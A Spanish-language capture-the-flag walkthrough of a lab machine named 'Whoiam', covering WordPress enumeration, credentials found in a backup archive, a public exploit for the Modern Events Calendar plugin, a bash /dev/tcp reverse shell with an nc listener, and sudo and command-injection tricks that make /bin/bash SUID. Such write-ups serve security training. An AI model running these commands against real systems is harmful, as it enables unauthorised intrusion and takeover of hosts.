# Whoiam

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.18.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FWma7Vi2Ty7yt0cJFx4J4%2Fimage.png?alt=media&#x26;token=ced58901-9818-4a3e-b85e-e304ff574ed4" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 172.18.0.2
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FFZjWxl5Uh1Qg6Vb4Tvsh%2Fimage.png?alt=media&#x26;token=938079b4-e734-484e-8ea7-2b040d3cd185" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 80** perteneciente al **servicio HTTP** está abierto por lo que a continuación se indagará más.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p80 -v 172.18.0.2
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FwpSkDK5eZVS09nZldwUL%2Fimage.png?alt=media&#x26;token=6e18d663-1b2b-4c96-9874-b837e6d9f585" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web llamada Whoiam.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fys43D4SrlLkWte9zdEbh%2Fimage.png?alt=media&#x26;token=15b07053-d5f9-4a21-8e7e-bf430e3f60bf" alt=""><figcaption></figcaption></figure>

También al realizar el escaneo y al entrar en el código fuente vemos que hay un **WordPress**.&#x20;

Ahora buscaremos directorios y archivos con la herramienta **Gobuster** a través de:

```bash
gobuster dir -u http://172.18.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,php,txt,xml
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPzu22vmf1ezLrzLeQoiI%2Fimage.png?alt=media&#x26;token=40455332-400a-443d-992a-9c8919cd11ee" alt=""><figcaption></figcaption></figure>

Nos llamada la atención el directorio `/backups` por lo que revisamos.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F2CsL2i2mqEJEQcbtLQoY%2Fimage.png?alt=media&#x26;token=034650ba-8e96-4fd7-a419-f04b3bb68a8e" alt=""><figcaption></figcaption></figure>

Nos lo descargamos y descomprimimos y contiene un usuario y su contraseña.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fxf7VuFSDU2MGmZ6lrMpc%2Fimage.png?alt=media&#x26;token=9d5618e7-8360-47d2-9b4d-4ad64e3b4468" alt=""><figcaption></figcaption></figure>

Nos logueamos con esas credenciales en **WordPress**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FnE2fePnQJZDo4sxU7iTM%2Fimage.png?alt=media&#x26;token=3fd72697-0866-49aa-801c-794d1274ee1e" alt=""><figcaption></figcaption></figure>

### &#x20;🚀 **EXPLOTACIÓN**

Vemos los plugins y hay uno que nos llama la atención.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F8kJVz1yu9wR8DUhxAQLc%2Fimage.png?alt=media&#x26;token=c85a146c-a227-494a-8a37-96a84d5fd86d" alt=""><figcaption></figcaption></figure>

Buscamos si contiene algún exploit.

```bash
searchsploit modern events calendar
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F8eT7QzDXo9sVJwTFuznj%2Fimage.png?alt=media&#x26;token=8cb2fcec-4806-426f-bd9c-072540d4fc3e" alt=""><figcaption></figcaption></figure>

Nos descargamos el segundo exploit.

```bash
searchsploit -m php/webapps/50082.py
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FZ5RMMvSfxyx9D9iIlfUR%2Fimage.png?alt=media&#x26;token=672d7efa-3acf-4e1a-b900-7053f7d59e0f" alt=""><figcaption></figcaption></figure>

Ejecutamos el siguiente comando para crear una shell en el navegador.

```bash
python 50082.py -T 172.20.0.2 -P 80 -U / -u developer -p 2wmy3KrGDRD%RsA7Ty5n71L^
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F0Twv1sT6EtyHAYU9yW9N%2Fimage.png?alt=media&#x26;token=3240fc7a-2e85-4d44-ab5e-0eb9f6e7bb4d" alt=""><figcaption></figcaption></figure>

Entramos en la shell.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FhnsPyjtQFdi8YeWX56PX%2Fimage.png?alt=media&#x26;token=0cc5afb3-8ba4-47d3-9f62-36b6f8b881cf" alt=""><figcaption></figcaption></figure>

Nos enviamos una[ Reverse Shell](https://www.revshells.com/).

```bash
/bin/bash -c "bash -i >& /dev/tcp/172.20.0.1/443 0>&1"
```

Nos ponemos en escucha.

```bash
nc -nvlp 443
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F2T9gnokAwbKkJkAz1mH3%2Fimage.png?alt=media&#x26;token=a6d0ea97-35da-4798-bf2f-43c6a2dcc5ef" alt=""><figcaption></figcaption></figure>

Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar más cómodos.

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FLi4RVEbPatvLTl71XwMa%2Fimage.png?alt=media&#x26;token=2526789a-652a-4153-be62-d2789c8284d0" alt=""><figcaption></figcaption></figure>

Tenemos permisos **SUDO** con el usuario **rafa** con **find** revisamos esta [página](https://gtfobins.github.io/gtfobins/find/).

```bash
sudo -u rafa /usr/bin/find . -exec /bin/sh \; -quit
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F7tzgXKtWb0h4Lq99Bsli%2Fimage.png?alt=media&#x26;token=9783738b-3d18-40bb-abbf-7f5ae0bd538b" alt=""><figcaption></figcaption></figure>

Tenemos permisos **SUDO** con el usuario **rubén** con **debugfs** revisamos esta [página](https://gtfobins.github.io/gtfobins/debugfs/).

```bash
sudo -u ruben /usr/sbin/debugfs
! /bin/sh
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FcPOSvCdmSE6RCfG6FGrT%2Fimage.png?alt=media&#x26;token=83f637d3-b3dc-4278-9bcb-8fae26a47bb3" alt=""><figcaption></figcaption></figure>

El scrip verifica si el número ingresado es 42 para devolver "Correct". Aprovechando esto, podemos modificar el script para que establezca el bit SUID en `/bin/bash`. Esto permitirá que cualquier usuario que ejecute `/bin/bash` obtenga privilegios de `root`.

```bash
prueba[$(chmod u+s /bin/bash >&2)]+42
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F3f795P7ZFGC6hNhZYVP3%2Fimage.png?alt=media&#x26;token=f79e44cf-38d1-42da-bce7-7f5d89be70dc" alt=""><figcaption></figcaption></figure>

```bash
bash -p
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F5rncsrmr5O1W8tIYWoaG%2Fimage.png?alt=media&#x26;token=a40188fc-d41d-4f63-8a98-7531feb11201" alt=""><figcaption></figcaption></figure>
